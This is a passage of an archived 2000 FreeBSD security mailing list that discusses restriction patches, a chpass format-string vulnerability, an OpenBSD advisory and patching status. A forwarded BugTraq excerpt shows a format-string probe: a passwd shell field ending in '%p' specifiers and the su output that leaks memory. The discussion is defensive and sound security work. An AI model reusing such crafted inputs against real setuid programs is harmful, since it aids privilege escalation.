non-priv'ed users. If they actually work well (I have not tried them), is there a reason they could not be added and enabled with a make.conf setting or kernel option or both? The patches came with no licensing information, so I don't know what the author is up to. Heck, he may have already provided them to some committers for a look, I dunno. Like I said, I did not see anything about this on here and thought this list would be interested. (BTW, at least when I tried yesterday, the ftp site given did not have the code, but the http URL worked.) -------- Original Message -------- Subject: eth-security : ANNOUNCE : Resources no for ALL Date: Mon, 2 Oct 2000 14:48:57 +0200 From: yeti Reply-To: yeti To: BUGTRAQ@SECURITYFOCUS.COM --== Resources Not for All ==-- version 1.0 by y3t1@eth-security.net -- ===== -- Overview -- ===== -- RnA is collection of security improvements for - FreeBSD 4.0-RELASE Restricted kernel process table and proc filesystem *---------------------------------------------------* This patch gives limited access for non-root to process table ,only root see all process and have access to their entries in proc filesystem. Permission to directories in proc filesystem is changed to 550 (dr-xr-x---) .Non-root users can only see own proceses. some example : from root console : pc1:~# ps ax PID TT STAT TIME COMMAND 0 ?? DLs 0:00.01 (swapper) 1 ?? ILs 0:00.17 /sbin/init -- 2 ?? DL 0:03.64 (pagedaemon) 3 ?? DL 0:00.00 (vmdaemon) 4 ?? DL 0:00.01 (bufdaemon) 5 ?? DL 0:00.54 (syncer) 25 ?? Is 0:00.00 adjkerntz -i [...] from user : pc1:~$ ps ax PID TT STAT TIME COMMAND 154 v3 Ss 0:00.17 -bash (bash) 406 v3 R+ 0:00.00 ps ax Restricted who/w/last *---------------------------------------------------* Restricted who/w/last gives limited access to utmp/wtmp entries. Users can see only own login to system (no group like w_all,w_grp) , but if user is added to group w_grp can see own and group login . Group w_all is for trusted users that have full read access to utmp/wtmp . for example : from root console : pc1:~# who root ttyv0 Sep 27 21:32 root ttyv1 Sep 27 20:20 y3t1 ttyp1 Sep 27 22:06 (100.0.0.2) blah ttyp2 Sep 27 20:30 (195.17.21.113) lump ttyp5 Sep 20 13.56 (63.30.55.243) from non-root console pc1:~$ who y3t1 ttyp1 Sep 27 22:06 (100.0.0.2) from non-root console if user is added to group w_all pc1:~$ who root ttyv0 Sep 27 21:32 root ttyv1 Sep 27 20:20 y3t1 ttyp1 Sep 27 22:06 (100.0.0.2) blah ttyp2 Sep 27 20:30 (195.17.21.113) plum ttyp5 Sep 20 13.56 (63.30.55.243) from non-root console if user is added to group w_grp pc1:~$ who y3t1 ttyp1 Sep 27 22:06 (100.0.0.2) blah ttyp2 Sep 27 20:30 (195.17.21.113) plum ttyp5 Sep 20 13.56 (63.30.55.243) Commands w/last are restricted with similar way . How to Install *---------------------------------------------------* De-tar rna archive tar xvzf rna.tar.gz and run cd RnA/ ./RnA cd /sys/compile/your_kernel_name/ make config make make install cd /usr/src/usr.bin/who make make install cd /usr/src/usr.bin/w make make install cd /usr/src/usr.bin/last make make install Check permission to who/w/last (need sgid uwtmp group) and reboot your system . How to get *---------------------------------------------------* New version of rna you can get from : ftp://ftp.eth-security.net/pub/rna.tar.gz http://www.eth-security.net/files/rna.tar.gz http://rast.lodz.pdi.net/~y3t1/rna.tar.gz Greets *---------------------------------------------------* vx@mtl.pl - inspirate me to write this patches z33d@eth-security.net - b00m b00m b00m ... dawac pieniadze Admins from Institute of Physics(Wroclaw) - for testing patches and good diners all on : #sigsegv@ircnet : z33d,funkySh,Kris,detergent,crashkill,cliph,xfer and other cool guys rastlin,tmoggie,Shadow,Trolinka,lcamtuf,kodzak,venglin,spaceman ----- End forwarded message ----- -- Crist J. Clark cjclark@alum.mit.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 9:18:33 2000 Delivered-To: freebsd-security@freebsd.org Received: from ns.yogotech.com (ns.yogotech.com [206.127.123.66]) by hub.freebsd.org (Postfix) with ESMTP id 6C8C537B502 for ; Wed, 4 Oct 2000 09:18:30 -0700 (PDT) Received: from nomad.yogotech.com (nomad.yogotech.com [206.127.123.131]) by ns.yogotech.com (8.9.3/8.9.3) with ESMTP id KAA22181; Wed, 4 Oct 2000 10:18:29 -0600 (MDT) (envelope-from nate@nomad.yogotech.com) Received: (from nate@localhost) by nomad.yogotech.com (8.8.8/8.8.8) id KAA00416; Wed, 4 Oct 2000 10:18:24 -0600 (MDT) (envelope-from nate) Date: Wed, 4 Oct 2000 10:18:24 -0600 (MDT) Message-Id: <200010041618.KAA00416@nomad.yogotech.com> From: Nate Williams MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit To: David Wolfskill Cc: security@FreeBSD.ORG Subject: Re: cvs commit: src/etc inetd.conf In-Reply-To: <200010041357.e94DvQc92408@pau-amma.whistle.com> References: <200010031722.NAA41823@khavrinen.lcs.mit.edu> <200010041357.e94DvQc92408@pau-amma.whistle.com> X-Mailer: VM 6.34 under 19.16 "Lille" XEmacs Lucid Reply-To: nate@yogotech.com (Nate Williams) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > >> gets no response (after a time-out) it would be entitled to retry a > >> few times in case of packet loss. *But* if it gets a RST, which is a > > >If net.inet.tcp.blackhole is set, an RST will not be emitted. > > > If the concern is that you don't want sendmail to even try to do the > auth, just insert > > define(`confTO_IDENT', `0s')dnl > > in the .mc file from which the .cf is generated, and it won't do that > any more. Except the issue is less with the local sendmail, but other mail programs delivering email *to* the your local mail server. Nate To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 9:29:48 2000 Delivered-To: freebsd-security@freebsd.org Received: from earth.backplane.com (placeholder-dcat-1076843290.broadbandoffice.net [64.47.83.26]) by hub.freebsd.org (Postfix) with ESMTP id 532CF37B502; Wed, 4 Oct 2000 09:29:46 -0700 (PDT) Received: (from dillon@localhost) by earth.backplane.com (8.11.0/8.9.3) id e94GTjD24278; Wed, 4 Oct 2000 09:29:45 -0700 (PDT) (envelope-from dillon) Date: Wed, 4 Oct 2000 09:29:45 -0700 (PDT) From: Matt Dillon Message-Id: <200010041629.e94GTjD24278@earth.backplane.com> To: Kris Kennaway Cc: freebsd-security@FreeBSD.org Subject: Re: Proposed minor mod to openssh for interactive operation References: <200009300023.e8U0NUW20137@earth.backplane.com> <20001004032836.B98174@freefall.freebsd.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org : :On Fri, Sep 29, 2000 at 05:23:30PM -0700, Matt Dillon wrote: : :> I have trivial patches (two minor tests), any objections to my committing :> them? Also, I'm not sure whether we are trying to keep our openssh :> synced with openbsd's. Does anyone know the procedure for making :> changes to openssh in FreeBSD's CVS tree? : :You should contribute these patches back to the OpenSSH developers :first - see www.openssh.com for contact details. I dont like making :changes to our version of openssh unless we have to, since it makes my :job harder managing the divergences when I import a new version. If :you really can't get them to accept the patches, then let me know.. : :Kris Will do! -Matt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 9:43:16 2000 Delivered-To: freebsd-security@freebsd.org Received: from gw.nectar.com (gw.nectar.com [208.42.49.153]) by hub.freebsd.org (Postfix) with ESMTP id 47D8437B502 for ; Wed, 4 Oct 2000 09:43:09 -0700 (PDT) Received: from hamlet.nectar.com (hamlet.nectar.com [10.0.1.102]) by gw.nectar.com (Postfix) with ESMTP id 44F4319268; Wed, 4 Oct 2000 11:43:08 -0500 (CDT) Received: (from nectar@localhost) by hamlet.nectar.com (8.9.3/8.9.3) id LAA54034; Wed, 4 Oct 2000 11:43:08 -0500 (CDT) (envelope-from nectar@spawn.nectar.com) Date: Wed, 4 Oct 2000 11:43:08 -0500 From: "Jacques A. Vidrine" To: cjclark@alum.mit.edu Cc: freebsd-security@freebsd.org Subject: Re: Fwd: eth-security : ANNOUNCE : Resources no for ALL Message-ID: <20001004114308.B23379@hamlet.nectar.com> Mail-Followup-To: "Jacques A. Vidrine" , cjclark@alum.mit.edu, freebsd-security@freebsd.org References: <20001004084729.C25121@149.211.6.64.reflexcom.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20001004084729.C25121@149.211.6.64.reflexcom.com>; from cjclark@reflexnet.net on Wed, Oct 04, 2000 at 08:47:29AM -0700 X-Url: http://www.nectar.com/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Oct 04, 2000 at 08:47:29AM -0700, Crist J . Clark wrote: > This was posted to BugTraq yesterday. It is a series of patches to > restrict certain information from non-priv'ed users. man jail -- Jacques Vidrine / n@nectar.com / jvidrine@verio.net / nectar@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 10:14:58 2000 Delivered-To: freebsd-security@freebsd.org Received: from silby.com (cb34181-c.mdsn1.wi.home.com [24.183.3.139]) by hub.freebsd.org (Postfix) with ESMTP id B085637B66C for ; Wed, 4 Oct 2000 10:14:52 -0700 (PDT) Received: (qmail 89756 invoked by uid 1000); 4 Oct 2000 17:16:02 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 4 Oct 2000 17:16:02 -0000 Date: Wed, 4 Oct 2000 12:16:02 -0500 (CDT) From: Mike Silbersack To: security@freebsd.org Subject: Re: OpenBSD Security Advisory (fwd) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Content-ID: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Are we patched? Mike "Silby" Silbersack ---------- Forwarded message ---------- Date: Wed, 4 Oct 2000 00:31:03 -0700 From: K2 To: BUGTRAQ@SECURITYFOCUS.COM Subject: Re: OpenBSD Security Advisory Hi, Here is another exploit for an application (fstat) that OpenBSD's format string audit has seemingly forgotten about. What I would like to know is why this and a number of other privileged applications have security vulnerabilities in them. They WERE fixed, but NO ADVISORY nor ANY MENTION IN THEIR DAILY CHANGLOG! How can the impact of the vulnerability not be realized when they occur in something as privileged as that would be using pw_error()? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 10:19:23 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id DFBD137B502 for ; Wed, 4 Oct 2000 10:19:18 -0700 (PDT) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.11.0/8.11.0) with ESMTP id e94HJGM16297; Wed, 4 Oct 2000 11:19:17 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id LAA37604; Wed, 4 Oct 2000 11:19:16 -0600 (MDT) Message-Id: <200010041719.LAA37604@harmony.village.org> To: Mike Tancsa Subject: Re: Fwd: BSD chpass Cc: freebsd-security@FreeBSD.ORG In-reply-to: Your message of "Wed, 04 Oct 2000 01:12:59 EDT." <4.2.2.20001004011210.035225e0@mail.sentex.net> References: <4.2.2.20001004011210.035225e0@mail.sentex.net> Date: Wed, 04 Oct 2000 11:19:16 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <4.2.2.20001004011210.035225e0@mail.sentex.net> Mike Tancsa writes: : OK, here is a nasty bugtraq posting :-( There will be an advisory about this, but the short answer is: o 1.x is NOT vulnerable o 2.x, and 3.x through 3.5.1-RELEASE and 4.0-RELEASE are vulnerable o 4.1-RELEASE and 4.1.1-RELEASE are NOT vulnerable o 2.1.x-stable, 2.2.8-stable and 3.5.1-stable have been fixed as of 8 hours ago. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 10:20:50 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 1B1FE37B503 for ; Wed, 4 Oct 2000 10:20:42 -0700 (PDT) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.11.0/8.11.0) with ESMTP id e94HKcM16309; Wed, 4 Oct 2000 11:20:38 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id LAA37630; Wed, 4 Oct 2000 11:20:37 -0600 (MDT) Message-Id: <200010041720.LAA37630@harmony.village.org> To: Matt Heckaman Subject: Re: Fwd: BSD chpass Cc: Mike Tancsa , freebsd-security@FreeBSD.ORG In-reply-to: Your message of "Wed, 04 Oct 2000 01:16:50 EDT." References: Date: Wed, 04 Oct 2000 11:20:37 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message Matt Heckaman writes: : I've confirmed this to work on 3.5-STABLE as of Sep 21. It did NOT work on : my 4.1-STABLE or 4.1.1-RELEASE machines, but they could still be : vulnerable in a method outside the scope of the posted exploit. I just : found out about this 5 minutes and ran to turn off the suid bit :P 4.1R and 4.1.1R are known to be safe. 3.5.1-stable was patched last night at about 0600GMT. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 10:21:45 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 8031B37B503 for ; Wed, 4 Oct 2000 10:21:43 -0700 (PDT) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.11.0/8.11.0) with ESMTP id e94HLeM16318; Wed, 4 Oct 2000 11:21:40 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id LAA37650; Wed, 4 Oct 2000 11:21:40 -0600 (MDT) Message-Id: <200010041721.LAA37650@harmony.village.org> To: Mike Silbersack Subject: Re: Fwd: BSD chpass Cc: Matt Heckaman , Mike Tancsa , freebsd-security@FreeBSD.ORG In-reply-to: Your message of "Wed, 04 Oct 2000 00:24:19 CDT." References: Date: Wed, 04 Oct 2000 11:21:40 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message Mike Silbersack writes: : Unless the nsswitch changes fixed it, 4.1.1 should still be vulnerable - : there are no messages in the cvs logs for chpass indicating any : security-related changes recently. (For both FreeBSD and OpenBSD.) No. Kris' sweep of the tree on July 12th for format problems fixed it. Ditto with Millert's sweep of the tree on or about June 30th for OpenBSD. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 10:22: 6 2000 Delivered-To: freebsd-security@freebsd.org Received: from digitalinet.com (digitalinet.com [216.65.124.130]) by hub.freebsd.org (Postfix) with SMTP id 5E15D37B66D for ; Wed, 4 Oct 2000 10:22:04 -0700 (PDT) Received: (qmail 21943 invoked from network); 4 Oct 2000 17:21:59 -0000 Received: from unknown (HELO dns) (24.26.71.114) by digitalinet.com with SMTP; 4 Oct 2000 17:21:59 -0000 Message-ID: <008001c02e26$c20c6100$03030303@dns> From: "John" To: "Mike Tancsa" , "Warner Losh" Cc: References: <4.2.2.20001004011210.035225e0@mail.sentex.net> <200010041719.LAA37604@harmony.village.org> Subject: Re: Fwd: BSD chpass Date: Wed, 4 Oct 2000 13:15:55 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org chmod a-s /usr/bin/chpass or chmod 700 /usr/bin/chpass Solution or not ? I believe that will work out just fine. ----- Original Message ----- From: "Warner Losh" To: "Mike Tancsa" Cc: Sent: Wednesday, October 04, 2000 1:19 PM Subject: Re: Fwd: BSD chpass > In message <4.2.2.20001004011210.035225e0@mail.sentex.net> Mike Tancsa writes: > : OK, here is a nasty bugtraq posting :-( > > There will be an advisory about this, but the short answer is: > o 1.x is NOT vulnerable > o 2.x, and 3.x through 3.5.1-RELEASE and 4.0-RELEASE are vulnerable > o 4.1-RELEASE and 4.1.1-RELEASE are NOT vulnerable > o 2.1.x-stable, 2.2.8-stable and 3.5.1-stable have been fixed as > of 8 hours ago. > > Warner > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 10:23:40 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 3F8A937B502 for ; Wed, 4 Oct 2000 10:23:32 -0700 (PDT) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.11.0/8.11.0) with ESMTP id e94HNSM16336; Wed, 4 Oct 2000 11:23:28 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id LAA37682; Wed, 4 Oct 2000 11:23:26 -0600 (MDT) Message-Id: <200010041723.LAA37682@harmony.village.org> To: Tim Yardley Subject: Re: Fwd: BSD chpass Cc: Mike Silbersack , freebsd-security@FreeBSD.ORG In-reply-to: Your message of "Wed, 04 Oct 2000 01:18:25 CDT." <5.0.0.25.2.20001004011552.02eee900@students.uiuc.edu> References: <5.0.0.25.2.20001004011552.02eee900@students.uiuc.edu> Date: Wed, 04 Oct 2000 11:23:26 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <5.0.0.25.2.20001004011552.02eee900@students.uiuc.edu> Tim Yardley writes: : I would just like to point out that it was posted to bugtraq because the : original work in progress exploit was leaked. Venders are always notified : once you have something that works, and caddis is not in exception to this : rule. The leak caused this bug to be posted before it was meant to be. If : you do notice, obsd posted an advisory right after, which does show that at : least some people were in the "know". We had rumblings of this on the SO list at about 3pm or so yesterday, but that was from the OpenBSD folks wanting to know what versions were vulnerable. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 10:31:53 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 4549737B502 for ; Wed, 4 Oct 2000 10:31:49 -0700 (PDT) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.11.0/8.11.0) with ESMTP id e94HVlM16365; Wed, 4 Oct 2000 11:31:48 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id LAA37754; Wed, 4 Oct 2000 11:31:47 -0600 (MDT) Message-Id: <200010041731.LAA37754@harmony.village.org> To: Mike Silbersack Subject: Re: OpenBSD Security Advisory (fwd) Cc: security@FreeBSD.ORG In-reply-to: Your message of "Wed, 04 Oct 2000 12:16:02 CDT." References: Date: Wed, 04 Oct 2000 11:31:47 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message Mike Silbersack writes: : Are we patched? Yes. It doesn't look like we were ever vulnerable for fstat. From the little poking around I did with annotate, I think we've been safe from the outset, at least since 1997 with charnier's warn*/err* cleanups. Unless this is something subtle that I'm missing. We really need someone to go through the format fixes and back port them to 3.x and 2.x. Volunteers? Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 10:32:49 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 3F65837B503 for ; Wed, 4 Oct 2000 10:32:46 -0700 (PDT) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.11.0/8.11.0) with ESMTP id e94HWhM16374; Wed, 4 Oct 2000 11:32:43 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id LAA37782; Wed, 4 Oct 2000 11:32:43 -0600 (MDT) Message-Id: <200010041732.LAA37782@harmony.village.org> To: "John" Subject: Re: Fwd: BSD chpass Cc: "Mike Tancsa" , freebsd-security@FreeBSD.ORG In-reply-to: Your message of "Wed, 04 Oct 2000 13:15:55 EDT." <008001c02e26$c20c6100$03030303@dns> References: <008001c02e26$c20c6100$03030303@dns> <4.2.2.20001004011210.035225e0@mail.sentex.net> <200010041719.LAA37604@harmony.village.org> Date: Wed, 04 Oct 2000 11:32:43 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <008001c02e26$c20c6100$03030303@dns> "John" writes: : chmod a-s /usr/bin/chpass : or chmod 700 /usr/bin/chpass : : Solution or not ? I believe that will work out just fine. workaround. It will protect you from the exploit, but much functionality that these commands provide will be lost. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 10:34:28 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.rpi.edu (mail.rpi.edu [128.113.100.7]) by hub.freebsd.org (Postfix) with ESMTP id 76ACF37B502; Wed, 4 Oct 2000 10:34:24 -0700 (PDT) Received: from [128.113.24.47] (gilead.acs.rpi.edu [128.113.24.47]) by mail.rpi.edu (8.9.3/8.9.3) with ESMTP id NAA257924; Wed, 4 Oct 2000 13:34:20 -0400 Mime-Version: 1.0 X-Sender: drosih@mail.rpi.edu Message-Id: In-Reply-To: <20001004032836.B98174@freefall.freebsd.org> References: <200009300023.e8U0NUW20137@earth.backplane.com> <20001004032836.B98174@freefall.freebsd.org> Date: Wed, 4 Oct 2000 13:34:18 -0400 To: Kris Kennaway , Matt Dillon From: Garance A Drosihn Subject: Re: Proposed minor mod to openssh for interactive operation Cc: freebsd-security@FreeBSD.ORG Content-Type: text/plain; charset="us-ascii" ; format="flowed" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 3:28 AM -0700 10/4/00, Kris Kennaway wrote: >On Fri, Sep 29, 2000 at 05:23:30PM -0700, Matt Dillon wrote: > > > I have trivial patches (two minor tests), any objections to > > my committing them? Also, I'm not sure whether we are trying > > to keep our openssh synced with openbsd's. Does anyone know > > the procedure for making changes to openssh in FreeBSD's CVS tree? > >You should contribute these patches back to the OpenSSH developers >first - see www.openssh.com for contact details. I dont like making >changes to our version of openssh unless we have to, since it makes my >job harder managing the divergences when I import a new version. If >you really can't get them to accept the patches, then let me know.. I would also like to plead that we try and keep openssh on freebsd as close to the "official" one as possible. Here at RPI, I ssh between systems running freebsd, openbsd, MacOS 10pb, AIX, Solaris, IRIX, and even a nextstation or two. Adding features that only appear on one platform is pretty useless to me. Adding them to the "official portable openssh" is much more useful. Note that the "portable openssh" is different than the openssh which openbsd comes with, so we aren't trying to keep in sync with openbsd per se. --- Garance Alistair Drosehn = gad@eclipse.acs.rpi.edu Senior Systems Programmer or drosih@rpi.edu Rensselaer Polytechnic Institute To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 10:49:55 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 82F9237B502 for ; Wed, 4 Oct 2000 10:49:49 -0700 (PDT) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.11.0/8.11.0) with ESMTP id e94HnlM16501; Wed, 4 Oct 2000 11:49:48 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id LAA38070; Wed, 4 Oct 2000 11:49:47 -0600 (MDT) Message-Id: <200010041749.LAA38070@harmony.village.org> To: K2 Subject: Re: OpenBSD Security Advisory Cc: security@freebsd.org In-reply-to: Your message of "Wed, 04 Oct 2000 00:31:03 PDT." <39DADCB7.4E416D8B@ktwo.ca> References: <39DADCB7.4E416D8B@ktwo.ca> Date: Wed, 04 Oct 2000 11:49:47 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I've had two requests from users to go through this and report on FreeBSD's status. I answered the fstat's portion in earlier mail, so I'll just say we aren't vulnerable and haven't been for a long long time. Since we're not vulnerable to any of these, I have a problem posting that to bugtraq as those sorts of messages tend to create a lot of clutter and ill will. In message <39DADCB7.4E416D8B@ktwo.ca> K2 writes: : There is also su, although it is only exploitable by the : usershell=format string, there is a possibility that somebody have a : third party application set the user shell to something that may be : malicious. Why no even passing mention in their "Daily Changelog" or : their security pages? : : ---- SNIP -- SNIP ---- : rain:/usr/src/libexec/talkd# su - ktwo : su: /usr/local/bin/bash0x00x1b150xdfbfdc8c0xdfbfdc280xdfbfdc2c: No such : file or directory : rain:/usr/src/libexec/talkd# cat /etc/passwd|grep ktwo : ktwo:*:100:100:what's your : style,,,:/home/ktwo:/usr/local/bin/bash%p%p%p%p%p FreeBSD has been immmune to this attack for a long time (since at least 1994, maybe earlier): 1.1 (rgrimes 27-May-94): err(1, "%s", shell); : talkd, A DEFAULT service. FreeBSD has never had this hole, as far as I can tell. We don't use fprintf here, but instead we build an iovect list up. : WOW what about photurisd? We don't have photurisd. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 11: 4:38 2000 Delivered-To: freebsd-security@freebsd.org Received: from jade.chc-chimes.com (jade.chc-chimes.com [216.28.46.6]) by hub.freebsd.org (Postfix) with ESMTP id 2091C37B502 for ; Wed, 4 Oct 2000 11:04:37 -0700 (PDT) Received: by jade.chc-chimes.com (Postfix, from userid 1001) id 87A6B1C7B; Wed, 4 Oct 2000 14:04:36 -0400 (EDT) Date: Wed, 4 Oct 2000 14:04:36 -0400 From: Bill Fumerola To: "Jacques A. Vidrine" Cc: cjclark@alum.mit.edu, freebsd-security@freebsd.org Subject: Re: Fwd: eth-security : ANNOUNCE : Resources no for ALL Message-ID: <20001004140436.K38472@jade.chc-chimes.com> References: <20001004084729.C25121@149.211.6.64.reflexcom.com> <20001004114308.B23379@hamlet.nectar.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <20001004114308.B23379@hamlet.nectar.com>; from n@nectar.com on Wed, Oct 04, 2000 at 11:43:08AM -0500 X-Operating-System: FreeBSD 3.3-STABLE i386 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Oct 04, 2000 at 11:43:08AM -0500, Jacques A. Vidrine wrote: > On Wed, Oct 04, 2000 at 08:47:29AM -0700, Crist J . Clark wrote: > > This was posted to BugTraq yesterday. It is a series of patches to > > restrict certain information from non-priv'ed users. > > man jail also, see kern.ps_showallprocs. I sent a letter to bugtraq regarding kern.ps_showallprocs, but evidently approving posts of exploits that haven't been sent to the the vendor takes up too much time and approving my post isn't a priority. -- Bill Fumerola - Network Architect, BOFH / Chimes, Inc. billf@chimesnet.com / billf@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 11: 6:39 2000 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 709BD37B503 for ; Wed, 4 Oct 2000 11:06:36 -0700 (PDT) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.9.3/8.9.3) with SMTP id OAA08137; Wed, 4 Oct 2000 14:06:11 -0400 (EDT) (envelope-from robert@fledge.watson.org) Date: Wed, 4 Oct 2000 14:06:11 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org To: cjclark@alum.mit.edu Cc: freebsd-security@freebsd.org Subject: Re: Fwd: eth-security : ANNOUNCE : Resources no for ALL In-Reply-To: <20001004084729.C25121@149.211.6.64.reflexcom.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 4 Oct 2000, Crist J . Clark wrote: > Restricted kernel process table and proc filesystem > *---------------------------------------------------* > > This patch gives limited access for non-root to process table ,only root > see all process and have access to their entries in proc filesystem. > Permission to directories in proc filesystem is changed > to 550 (dr-xr-x---) .Non-root users can only see own proceses. A feature very like this is present in 5.0-CURRENT, only /proc actually limits what processes can see there. Also, linprocfs is protected. You can set that feature using "sysctl -w kern.ps_showallprocs=0" with privilege. This feature was originally introduced by Paul Saab, I believe, but its incarnation in 4.x-STABLE isn't very complete, and doesn't protect /proc and linprocfs. My structural changes in inter-process authorization in the -CURRENT branch included the procfs fixes. Note that although this does protect /proc from listing processes that are owned by other users, it is still possible to walk the PID space using fork()/getpid() to identify in-use PIDs. I have not looked at backporting the inter-process 